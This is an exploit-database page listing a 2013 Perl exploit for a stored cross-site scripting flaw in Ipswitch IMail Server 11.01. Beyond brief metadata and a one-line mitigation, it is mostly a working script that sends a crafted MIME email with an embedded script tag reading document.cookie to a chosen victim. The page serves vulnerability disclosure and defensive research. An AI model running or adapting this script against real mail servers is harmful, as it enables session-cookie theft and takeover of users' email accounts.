header-logo
Suggest Exploit
vendor:
IMail Server
by:
DaOne aka Mocking Bird
7,5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: IMail Server
Affected Version From: 11.01
Affected Version To: 11.01
Patch Exists: NO
Related CWE: N/A
CPE: 2.3:a:ipswitch:imail_server:11.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013

Ipswitch IMail 11.01 XSS Vulnerability

This exploit uses a malicious script to send an email to a victim with an XSS payload. The payload is executed when the victim opens the email, allowing the attacker to access the victim's cookies.

Mitigation:

Input validation and output encoding can be used to prevent XSS attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability
# Date: 26-04-2013
# Author: DaOne  aka Mocking Bird
# Vendor Homepage: http://www.ipswitch.com/
# Platform: windows

use Net::SMTP;
 
# ARGV Check
if ($#ARGV != 2)
{
    print "\nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n";
    exit;
}
 
$host = $ARGV[0];
$attacker = $ARGV[1];
$victim = $ARGV[2];
 
# Config SMTP
$smtp = Net::SMTP->new(  Host => $host,
                        Hello => 'Hello world',
                        Timeout => 30)
or die "Couldn't connect to Mail Server\n";
 
# Attacker and Victim email
$smtp->mail($attacker);
$smtp->to($victim);
 
# Send email
$buffer = "From: XSS\n".
"To: testing\n".
"Subject: testing\n".
"MIME-Version: 1.0\n".
"Content-Type: multipart/mixed;\n".
"    boundary=\"--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\"\n\n".
"----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\n".
"Content-Type: text/html;\n".
"charset=\"utf-8\"\n".
"Content-Transfer-Encoding: quoted-printable\n\n".
"XSS\n".
"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n".
"<HTML><BODY>\n".
"<script >alert(document.cookie)</script >\n".
"</BODY></HTML>\n\n".
"----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--";
 
$smtp->data();
$smtp->datasend($buffer);
$smtp->quit();
 
print "Send.\n";
# Proof http://oi40.tinypic.com/34yw8hz.jpg